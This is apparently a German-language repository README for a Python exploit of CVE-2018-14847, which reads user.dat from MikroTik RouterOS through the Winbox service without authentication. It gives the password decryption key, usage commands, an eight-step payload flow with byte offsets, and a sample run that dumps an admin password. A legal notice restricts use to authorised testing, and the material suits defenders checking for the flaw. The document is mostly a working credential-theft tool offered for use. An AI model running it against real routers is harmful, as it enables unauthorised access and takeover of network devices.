
VULNERAVEL CVE-2018-14847 - CREDENCIAIS EXTRAIDAS MIKROTIK EM PYTHON
Repository für Skripte zur Netzwerkauditierung und Penetrationstests. Nur auf Geräten mit formeller Autorisierung verwenden.
Nutzt die Schwachstelle zum nicht authentifizierten Auslesen von Dateien im
Winbox-Dienst von MikroTik RouterOS aus. Der Dateihandler (Handler-ID 2) validiert
keine Authentifizierung, sodass ein externer Angreifer die Datei user.dat
lesen kann, die alle Benutzer und Passwörter des Geräts enthält.
Die Passwörter werden XOR-verschlüsselt mit dem Schlüssel MD5(Benutzer + "283i4jfkai3389") gespeichert.
Das Skript führt die Entschlüsselung automatisch durch.
| Branch | Verwundbar bis | Korrigierte Version |
|---|---|---|
| Stable | 6.42 | 6.42.1 |
| Long-term | 6.40.7 | 6.40.8 |
| RC | 6.42 | 6.43 |
python3 cve_2018_14847.py <IP>
python3 cve_2018_14847.py <IP> --port 8291
# Standardziel auf Port 8291
python3 cve_2018_14847.py 192.168.1.1
# Benutzerdefinierter Port
python3 cve_2018_14847.py 192.168.1.1 --port 8291
1. Verbinde zu Port 8291 (Winbox)
↓
2. Sende FIRST_PAYLOAD — öffne Session + fordere /flash/rw/store/user.dat an
↓
3. Extrahiere Session-ID aus Byte 38 der Antwort
↓
4. Injiziere Session-ID in Byte 19 von SECOND_PAYLOAD
↓
5. Sende SECOND_PAYLOAD — lese die Datei user.dat
↓
6. Parse M2-Einträge → extrahiere Benutzer und verschlüsseltes Passwort
↓
7. Entschlüssele Passwort: XOR mit MD5(Benutzer + Salt)
↓
8. Zeige Anmeldedaten an und speichere in Datei
═══════════════════════════════════════════════════════
CVE-2018-14847 — MikroTik Winbox Credential Dump
Unauthenticated File Read + Password Decryption
Betroffen: RouterOS 6.29 – 6.42 (< 6.40.8 / 6.42.1)
═══════════════════════════════════════════════════════
Ziel : 192.168.1.1:8291
Datum : 2026-05-20 18:06:58
[*] Verbinde zu 192.168.1.1:8291 ...
[+] Verbunden mit Winbox-Dienst.
[*] Sende Payload 1 (Dateianfrage) ...
[+] Antwort erhalten (84 Bytes). Session-ID: 0x35
[*] Sende Payload 2 (lese user.dat) ...
[+] Daten erhalten (312 Bytes).
[*] Analysiere user.dat (257 nutzbare Bytes) ...
═══════════════════════════════════════════════════════
EXTRAHIERTE ANMELDEDATEN
═══════════════════════════════════════════════════════
Benutzer : admin
Passwort : senha123
Kombi : admin:senha123
───────────────────────────────────────────────────────
[+] 1 Anmeldedatensatz/-sätze gefunden.
[+] Ergebnis gespeichert unter: mikrotik_1192.168.1.1_20260520_180658.txt
Das Ergebnis wird automatisch gespeichert unter:
mikrotik_<IP>_<TIMESTAMP>.txt
Beispiel: mikrotik_192.168.1.1_20260520_180658.txt
Enthält: Ziel-IP, Datum, CVE, betroffene Version und alle Paare Benutzer:Passwort.
/network/
├── README.md # diese Datei
├── cve_2018_14847.py # MikroTik Winbox Credential Extractor
├── pentest_cgnat_100.64.0.0.md # Pentest-Bericht CGNAT
├── pentest_roteador_192.168.2.1.md # Pentest-Bericht Router
└── mikrotik_<IP>_<TIMESTAMP>.txt # vom Skript generierte Ergebnisse
RECHTLICHER HINWEIS: Diese Werkzeuge sind ausschließlich für die Nutzung in autorisierten Umgebungen bestimmt. Die nicht autorisierte Ausführung gegen Systeme Dritter ist eine Straftat gemäß dem brasilianischen Gesetz 12.737/2012 (Lei Carolina Dieckmann) und Art. 154-A des brasilianischen Strafgesetzbuchs.